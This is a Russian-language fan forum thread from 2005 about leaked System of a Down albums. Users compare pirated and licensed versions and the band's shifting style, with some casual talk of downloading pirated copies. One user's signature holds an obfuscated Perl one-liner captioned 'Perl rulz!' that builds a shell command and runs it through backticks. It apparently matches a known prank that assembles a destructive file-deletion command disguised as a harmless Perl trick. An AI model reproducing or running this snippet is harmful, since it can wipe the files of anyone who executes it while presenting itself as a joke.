Serj on SoaDpage Свободу от фальшивого равенства вам может принести только www.soad.msk.ru
Предыдущая тема :: Следующая тема
Автор
Добавлено: Вс Ноя 13, 2005 11:18 pm Заголовок сообщения:
А вот кстати да Ты слышал оригиналы украденых песен?Там на ту же музыку,другие слова.И в некоторых случаях,довольно неплохие... Последний раз редактировалось: Sad Strider (Вс Ноя 13, 2005 11:19 pm), всего редактировалось 1 раз
x-girl Man Who Can Get At All Зарегистрирован: 11.11.2005 Сообщения: 241 Откуда: Минск
Добавлено: Вс Ноя 13, 2005 11:18 pm Заголовок сообщения:
Хочешь сказать, что пираты сами музыку писали? Или нечаянно Toxicity вместо hypnotize сперли?
Sad Strider Гость
Добавлено: Вс Ноя 13, 2005 11:20 pm Заголовок сообщения:
Если то,что я щас слушаю это Toxicity,то помоему я обкурился...
ALuserX псих-одиночка Зарегистрирован: 14.10.2005 Сообщения: 9828 Откуда: немецыя
Добавлено: Вс Ноя 13, 2005 11:21 pm Заголовок сообщения:
Maynard писал(а): а вот кстати забавно будет, если в том что украли будет одно, а на лиц. дисках - другое)
как например было с мезмеризом)
различие небольшое, но есть _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
$!=~/(.)(.).(.)(.)(.)(.)..(.)(.)(.)..(.)......(.)/,$"),$=++;$.++;$.++;
$_++;$_++;($_,$\,$,)=($~.$"."$;$/$%[$?]$_$\$,$:$%[$?]",$"&$~,$#,);$,++
;$,++;$^|=$";`$_$\$,$/$:$;$~$*$%[$?]$.$~$*${#}$%[$?]$;$\$"$^$~$*.>&$=`
Perl rulz!
x-girl Man Who Can Get At All Зарегистрирован: 11.11.2005 Сообщения: 241 Откуда: Минск
Добавлено: Вс Ноя 13, 2005 11:22 pm Заголовок сообщения:
И какое там различие было?
ALuserX псих-одиночка Зарегистрирован: 14.10.2005 Сообщения: 9828 Откуда: немецыя
Добавлено: Вс Ноя 13, 2005 11:27 pm Заголовок сообщения:
это слышать надо, я тебя уверяю, различия есть
хочешь качать алкоголь-оббраз тигриного мезмериза? 600 метров....нет ведь, а в мп3 конвертить лень... _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
Perl rulz!
Lobzik Almost God Зарегистрирован: 20.10.2005 Сообщения: 1693 Откуда: Москва
Добавлено: Пн Ноя 14, 2005 11:23 pm Заголовок сообщения:
Maynard писал(а): а вот кстати забавно будет, если в том что украли будет одно, а на лиц. дисках - другое)
Вот что-то и мне так кажется,что на легальном диске немнога по-другому будет!Хитрые армяне учли предыдущий опыт с Steal This Album
Добавлено: Вт Ноя 15, 2005 12:46 am Заголовок сообщения:
тут дело не в хитрости, они за 3-4 дня ничего не изменят
это только если пираты-релизеры еще давно сперли и только сейчас выпустили, что врядли _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
Perl rulz!
[re:]venge Apostate Зарегистрирован: 15.10.2005 Сообщения: 40 Откуда: Псков
Добавлено: Вт Ноя 15, 2005 3:20 pm Заголовок сообщения:
Sad Strider писал(а): Хорошо,я понял.Говорил же,правила ссылок не знаю.Всё,базара нету.А 192 это,помоему,нормальное качество.
Не, не катит... Хоть 192, хоть 320, а воспроизведение все равно какое-то фиговенькое... Лучше диск купить... Но диска еще ждать надо, а пиратский вариант - вот он _________________ Deaf and blind and dumb and born to follow
What you need is someone strong to guide you
Like me ©
SLAVARAN Man Who Can Get At All Зарегистрирован: 09.11.2005 Сообщения: 154
Добавлено: Чт Ноя 17, 2005 12:18 am Заголовок сообщения:
А че на ДВД будет вобще?Сет-лист известен?
Добавлено: Вс Ноя 20, 2005 12:35 am Заголовок сообщения:
Блин, я от алльбома в восторге!!! Хоть качество и не самое лучшее, но все равно!!! Невозможно словами описать!!!!!
Гость
Добавлено: Ср Ноя 30, 2005 8:40 pm Заголовок сообщения:
x-girl писал(а): Блин, я от алльбома в восторге!!! Хоть качество и не самое лучшее, но все равно!!! Невозможно словами описать!!!!!
У меня эмоции в том же ключе, в принципе, разве что не столь радужные... Однозначно круче и драйвовее, чем Mezmerize, и Малакяна вроде поменьше слышно ( ), но все равно мне не оч. нравится то русло, в которое нынче занесло Систему...
[re:]venge Apostate Зарегистрирован: 15.10.2005 Сообщения: 40 Откуда: Псков
Добавлено: Ср Ноя 30, 2005 8:42 pm Заголовок сообщения:
Тьфу, ёпт... Авторизовацца забыла... _________________ Deaf and blind and dumb and born to follow
What you need is someone strong to guide you
Like me ©
SkeL Apostate Зарегистрирован: 02.12.2005 Сообщения: 17 Откуда: Moscow
Добавлено: Сб Дек 03, 2005 5:22 pm Заголовок сообщения:
А в какое русло их занесло ? _________________ Друзья познаются в еде!
Добавлено: Вс Дек 04, 2005 2:05 pm Заголовок сообщения:
Ну, они немного стиль изменили. Разве незаметно? _________________ Все, чем ты гордишься, рано или поздно будет выброшено на помойку(с)
SkeL Apostate Зарегистрирован: 02.12.2005 Сообщения: 17 Откуда: Moscow
Добавлено: Пн Дек 05, 2005 12:36 am Заголовок сообщения:
В сторону большей мелодичности ?
Меня это русло вполне устраивает. _________________ Друзья познаются в еде!
Добавлено: Пн Дек 05, 2005 8:08 pm Заголовок сообщения:
Как раз мелодичности у них стало меньше _________________ Все, чем ты гордишься, рано или поздно будет выброшено на помойку(с)
Maynard Oh ja! Зарегистрирован: 14.10.2005 Сообщения: 2791
Добавлено: Вт Дек 06, 2005 1:28 am Заголовок сообщения:
мелодичности стало меньше по сравнению с чем? _________________ Fortuna non penis in manus non recipe
AC↑B↑BA↓ ажамбех пашамбе эшельбе шайтанама!
Добавлено: Вт Дек 06, 2005 7:33 pm Заголовок сообщения:
По сравнению с другими альбомами _________________ Все, чем ты гордишься, рано или поздно будет выброшено на помойку(с)
Maynard Oh ja! Зарегистрирован: 14.10.2005 Сообщения: 2791
Добавлено: Ср Дек 07, 2005 12:10 am Заголовок сообщения:
не согласен) послушайте те же лонли дэй, солджер сайд, хипнотиз) _________________ Fortuna non penis in manus non recipe
AC↑B↑BA↓ ажамбех пашамбе эшельбе шайтанама!